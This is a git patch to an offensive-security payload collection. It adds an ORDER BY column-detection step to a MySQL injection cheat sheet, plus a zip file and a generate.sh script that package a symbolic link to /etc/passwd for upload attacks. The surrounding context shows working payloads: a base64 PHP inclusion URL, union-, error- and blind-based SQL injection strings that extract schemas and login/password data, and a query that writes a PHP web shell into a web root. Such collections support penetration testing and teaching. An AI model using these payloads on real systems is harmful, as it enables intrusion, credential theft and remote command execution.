From 6070ece522e67839b0bdae20cd8db83db99da3df Mon Sep 17 00:00:00 2001
From: Swissky <maxropelewski@gmail.com>
Date: Tue, 4 Jul 2017 23:17:59 +0200
Subject: [PATCH] Symbolic Link Zip + SQL injection ORDER BY

---
 PHP include/README.md                             |   3 ++-
 SQL injection/MySQL Injection.md                  |  14 ++++++++++++--
 .../ZIP Symbolic Link/etc_passwd.zip              | Bin 0 -> 169 bytes
 .../ZIP Symbolic Link/generate.sh                 |   2 ++
 4 files changed, 16 insertions(+), 3 deletions(-)
 create mode 100644 Upload insecure files/ZIP Symbolic Link/etc_passwd.zip
 create mode 100644 Upload insecure files/ZIP Symbolic Link/generate.sh

diff --git a/PHP include/README.md b/PHP include/README.md
index 43b07f8..8632bd4 100644
--- a/PHP include/README.md	
+++ b/PHP include/README.md	
@@ -51,4 +51,5 @@ http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbm
 ```
 
 ## Thanks to
-* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
+* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
+* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md
index 8ed4d4a..5ba6055 100644
--- a/SQL injection/MySQL Injection.md	
+++ b/SQL injection/MySQL Injection.md	
@@ -1,5 +1,15 @@
 # MYSQL Injection
 
+##Detect columns number
+Using a simple ORDER
+```
+order by 1
+order by 2
+order by 3
+...
+order by XXX
+```
+
 ##MySQL Union Based
 ```
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
@@ -24,7 +34,7 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) F
 ```
 
 ##MYSQL Error Based - Extractvalue function
-``` 
+```
 AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
@@ -61,4 +71,4 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ##MYSQL DROP SHELL
 ```
 SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
-```
\ No newline at end of file
+```
diff --git a/Upload insecure files/ZIP Symbolic Link/etc_passwd.zip b/Upload insecure files/ZIP Symbolic Link/etc_passwd.zip
new file mode 100644
index 0000000000000000000000000000000000000000..7d4e2a903d2af1a4ca59e02e38bed31fc6fd4013
GIT binary patch
literal 169
zcmWIWW@h1H00FP9PrSHx%4>21*&xiqAj6Q8nU@_J!pXqA=5KT)2$xoHGcdBeU<OKq
z2>sNOWc`A~;^Oj@0B=SnIc8i&Nq}qsgZ~Rb6vSXwh{0%v26(fwfz&Vpp%;+$1aTMu
D2=gG^

literal 0
HcmV?d00001

diff --git a/Upload insecure files/ZIP Symbolic Link/generate.sh b/Upload insecure files/ZIP Symbolic Link/generate.sh
new file mode 100644
index 0000000..cefdd26
--- /dev/null
+++ b/Upload insecure files/ZIP Symbolic Link/generate.sh	
@@ -0,0 +1,2 @@
+ln -s /etc/passwd link
+zip --symlinks test.zip link